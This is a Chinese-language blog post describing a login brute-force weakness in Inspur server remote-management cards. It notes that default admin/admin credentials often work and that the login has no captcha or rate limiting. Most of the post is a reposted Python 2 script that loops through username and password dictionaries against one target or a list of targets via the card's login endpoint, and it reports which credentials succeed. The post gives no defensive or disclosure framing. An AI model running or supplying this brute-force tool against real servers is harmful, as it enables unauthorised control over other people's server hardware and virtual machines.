浪潮远控卡登录爆破漏洞(附爆破脚本)

  • A+
所属分类:颓废's Blog
摘要

爆破成功 浪潮远控卡可以尝试使用admin/admin进行登录尝试,很有可能可以进去。另外浪潮远控卡登录没有验证码,没有频率测试限制,可以轻松使用burpsuite进行登录爆破尝试。


浪潮远控卡是一款插在服务器上的,方便运维人员和服务器管理人员对服务器进行远程控制的WEB服务,其在80端口对外提供HTTP服务。登录进去以后可以对服务器硬件进行远程控制和管理。例如CPU、内存等性能指标监控,远程开启关闭服务器上的虚拟机,甚至作为控制虚拟主机的跳板机。

浪潮远控卡登录爆破漏洞(附爆破脚本)

爆破成功

浪潮远控卡登录爆破漏洞(附爆破脚本)

浪潮远控卡可以尝试使用admin/admin进行登录尝试,很有可能可以进去。另外浪潮远控卡登录没有验证码,没有频率测试限制,可以轻松使用burpsuite进行登录爆破尝试。

浪潮远控卡登录爆破漏洞(附爆破脚本)

浪潮远控卡登录爆破漏洞(附爆破脚本)

下面是某位大大的脚本

#!/usr/bin/env python # -*- coding:utf-8 -*-  #import lib files import os import sys import logging import requests from optparse import OptionParser  #global configuration set reload(sys) sys.setdefaultencoding("utf-8") logging.basicConfig(format='%(asctime)s-%(message)s',datefmt='%Y-%m-%d %H:%M:%S %p',level=logging.INFO)  #global varites defines HEADER = {     "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:57.0) Gecko/20100101 Firefox/57.0",     "Accept":"application/json, text/plain, */*",     "Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",     "Accept-Encoding":"gzip, deflate",     "Content-Type":"application/json;charset=utf-8" } SUCCESS_FLAG = "SESSION_COOKIE" USERNAME_LIST = ["admin"] PASSWORD_LIST = ["admin"]  #global functions defines def config_read_from_file(userfile,pswdfile):     global USERNAME_LIST     global PASSWORD_LIST     logging.info("[+] Read Configuration From File ...")     try:         with open(userfile,"r") as fr:             for line in fr.readlines():                 line = line.split("/n")[0].split("/r")[0]                 USERNAME_LIST.append(line)     except Exception,ex:         logstr = "[-] Configuration Read From File Failed! Reason:%s"%str(ex)         logging.error(logstr)         logging.info("[+] Use Default Dict!")     try:         with open(pswdfile,"r") as fr:             for line in fr.readlines():                 line = line.split("/n")[0].split("/r")[0]                 PASSWORD_LIST.append(line)     except Exception,ex:         logstr = "[-] Configuration Read From File Failed! Reason:%s"%str(ex)         logging.error(logstr)         logging.info("[+] Use Default Dict!")     return 0  def login_packet_send(target,username,password):     login_data = {"WEBVAR_USERNAME":username,"WEBVAR_PASSWORD":password}     try:         response = requests.post("http://%s/rpc/WEBSES/create.asp"%str(target),headers=HEADER,data=login_data,timeout=5)     except Exception,ex:         logstr = "[-] Connect Failed Reason:%s"%str(ex)         logging.error(logstr)         return -1     if response.status_code != 200:         return -1     else:         return response.content  def vuln_check(content):     if content.find(SUCCESS_FLAG) >= 0 and content.find("Failure_Login_IPMI_Then_LDAP_then_Active_Directory_Radius") < 0:         return 0     else:         return -1  def crack(target,username,password):     content = login_packet_send(target,username,password)     if content != -1:         if vuln_check(content) == 0:             logging.info("[*] Crack %s Success! Username:%s,Password:%s"%(str(target),str(username),str(password)))             return 0     return -1  def scan(target,targettype):     targetlist = []     if targettype == 1:         try:             with open(target,"r") as fr:                 for line in fr.readlines():                     line = line.split("/n")[0].split("/r")[0].replace(" ","")                     targetlist.append(line)         except Exception,ex:             pass     else:         targetlist = [target]     if len(target) > 0:         for item in targetlist:             for user in USERNAME_LIST:                 for pswd in PASSWORD_LIST:                     crack(item,user,pswd)  #main function -- programme if __name__ == "__main__":      parser = OptionParser()     parser.add_option("-t", "--target", dest="target",help="target to check")     parser.add_option("-f", "--filename", dest="targetfile",help="targetfiel to check")     parser.add_option("-u", "--userfile", dest="userfile",help="username dict")     parser.add_option("-p", "--pswdfile", dest="pswdfile",help="password dict")     (options, args) = parser.parse_args()     config_read_from_file(options.userfile,options.pswdfile)     if options.target not in ["",None," "]:         scan(options.target,0)     elif options.targetfile not in ["",None," "]:         scan(options.targetfile,1)

原文:http://www.cnblogs.com/KevinGeorge/p/8358456.html

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: